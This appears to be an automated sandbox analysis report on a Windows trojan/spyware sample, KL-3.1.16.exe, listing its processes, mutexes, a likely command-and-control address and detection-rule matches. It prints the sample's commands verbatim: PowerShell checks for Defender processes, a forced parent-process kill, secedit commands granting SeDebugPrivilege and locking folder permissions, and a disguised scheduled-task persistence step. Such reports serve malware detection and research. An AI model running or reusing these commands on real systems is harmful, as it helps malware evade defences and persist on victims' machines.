Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180032638	2_2_0000000180032638
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180028E38	2_2_0000000180028E38
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180035694	2_2_0000000180035694
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180027EB0	2_2_0000000180027EB0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002D6C0	2_2_000000018002D6C0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180026EEC	2_2_0000000180026EEC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003D774	2_2_000000018003D774
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_00000001800347B0	2_2_00000001800347B0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_0000000180039FD4	2_2_0000000180039FD4
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001FFE0	2_2_000000018001FFE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD340A82B2	12_2_00007FFD340A82B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_00007FFD340A7506	12_2_00007FFD340A7506
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_033D12D8	19_2_033D12D8
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06CFAEE0	33_2_06CFAEE0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06CFF69A	33_2_06CFF69A
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06D02A81	33_2_06D02A81
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_06D0A03E	33_2_06D0A03E
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_04ECB49F	33_2_04ECB49F
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_04ECFC59	33_2_04ECFC59
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 33_2_04ED3040	33_2_04ED3040

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 06CFA41B appears 46 times
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 04ECA9DA appears 42 times
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 06CF9E44 appears 95 times
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: String function: 04ECA403 appears 94 times
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: String function: 00000001800120F0 appears 66 times
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: String function: 0000000180002960 appears 55 times

Source: KL-3.1.16.exe

Static PE information: invalid certificate

Source: KL-3.1.16.exe, 00000000.00000003.2109190884.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs KL-3.1.16.exe
Source: KL-3.1.16.exe, 00000000.00000003.2109190884.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \StringFileInfo\%04x%04x\OriginalFilename vs KL-3.1.16.exe
Source: KL-3.1.16.exe, 00000000.00000003.2109190884.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SpecialBuildPrivateBuildOriginalFilenameLegalTrademarksLegalCopyrightProductNameInternalNameFileDescriptionCompanyNameProductVersionFileVersion\StringFileInfo\%04x%04x\SpecialBuild\StringFileInfo\%04x%04x\OriginalFilename\StringFileInfo\%04x%04x\Comments\StringFileInfo\%04x%04x\LegalTrademarks\StringFileInfo\%04x%04x\LegalCopyright\StringFileInfo\%04x%04x\ProductName\StringFileInfo\%04x%04x\InternalName\StringFileInfo\%04x%04x\FileDescription\StringFileInfo\%04x%04x\CompanyName" vs KL-3.1.16.exe
Source: KL-3.1.16.exe, 00000000.00000003.2109190884.00000000029DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesuf_rt.exeL vs KL-3.1.16.exe
Source: KL-3.1.16.exe, 00000000.00000000.2108732848.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename360SPTool.exe0 vs KL-3.1.16.exe
Source: KL-3.1.16.exe, 00000000.00000003.2109001256.00000000028D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename360SPTool.exe0 vs KL-3.1.16.exe

Source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 5ar6QsR4e.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9970552884615385
Source: 5ar6QsR4e.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9998007015306123
Source: 5ar6QsR4e.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9961726641414141
Source: iusb3mon.exe.18.dr	Static PE information: Section: ZLIB complexity 0.9970552884615385
Source: iusb3mon.exe.18.dr	Static PE information: Section: ZLIB complexity 0.9998007015306123
Source: iusb3mon.exe.18.dr	Static PE information: Section: ZLIB complexity 0.9961726641414141

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@240/102@1/3

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Code function: 2_2_0000000180010AB0 GetLastError,FormatMessageA,

2_2_0000000180010AB0

Source: C:\Users\user\Desktop\KL-3.1.16.exe

Code function: 0_2_00007FF6F92519B4 GetCurrentDirectoryA,GetTempPathA,lstrlenA,lstrcpyA,lstrlenA,lstrcatA,wsprintfA,wsprintfA,DeleteFileA,RemoveDirectoryA,GetFileAttributesA,CreateDirectoryA,lstrcpyA,SetCurrentDirectoryA,lstrcpyA,CreateDirectoryA,SetCurrentDirectoryA,lstrcpyA,lstrlenA,lstrcatA,lstrcpyA,lstrcpyA,lstrcatA,lstrcpyA,lstrcatA,GetDiskFreeSpaceA,lstrcpyA,SetCurrentDirectoryA,

0_2_00007FF6F92519B4

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: GetModuleFileNameA,wsprintfA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,RegOpenKeyA,lstrlenA,RegSetValueExA,

33_2_06CF6D6C

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_06CF5CE6 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

33_2_06CF5CE6

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 33_2_00C02170 Sleep,CoInitializeEx,CoCreateInstance,CoUninitialize,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,SysFreeString,CoUninitialize,CoUninitialize,SysFreeString,SysAllocString,VariantInit,VariantInit,VariantInit,SysFreeString,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,_com_issue_error,MessageBoxA,

33_2_00C02170

Source: C:\ProgramData\Program\iusb3mon.exe

33_2_06CF67CC

Source: C:\ProgramData\Program\iusb3mon.exe

33_2_06CF67CC

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

File created: C:\Program Files\product1\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

File created: C:\Users\Public\Documents\dbb08x\

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2456:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_03
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1216:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_03
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Mutant created: \Sessions\1\BaseNamedObjects\143.92.60.116:25445:
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5372:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03

Source: C:\Users\user\Desktop\KL-3.1.16.exe

File created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0

Jump to behavior

Source: KL-3.1.16.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select ParentProcessId from Win32_Process where ProcessId=6980

Source: C:\Users\user\Desktop\KL-3.1.16.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KL-3.1.16.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: KL-3.1.16.exe

Virustotal: Detection: 12%

Source: iusb3mon.exe	String found in binary or memory: lable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdl
Source: iusb3mon.exe	String found in binary or memory: lable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdl
Source: iusb3mon.exe	String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAva
Source: iusb3mon.exe	String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAva

Source: C:\Users\user\Desktop\KL-3.1.16.exe

File read: C:\Users\user\Desktop\KL-3.1.16.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KL-3.1.16.exe "C:\Users\user\Desktop\KL-3.1.16.exe"
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5904754 "__IRAFN:C:\Users\user\Desktop\KL-3.1.16.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=6980').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\inst.ini
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: unknown	Process created: C:\ProgramData\Program\iusb3mon.exe C:\ProgramData\program\iusb3mon.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
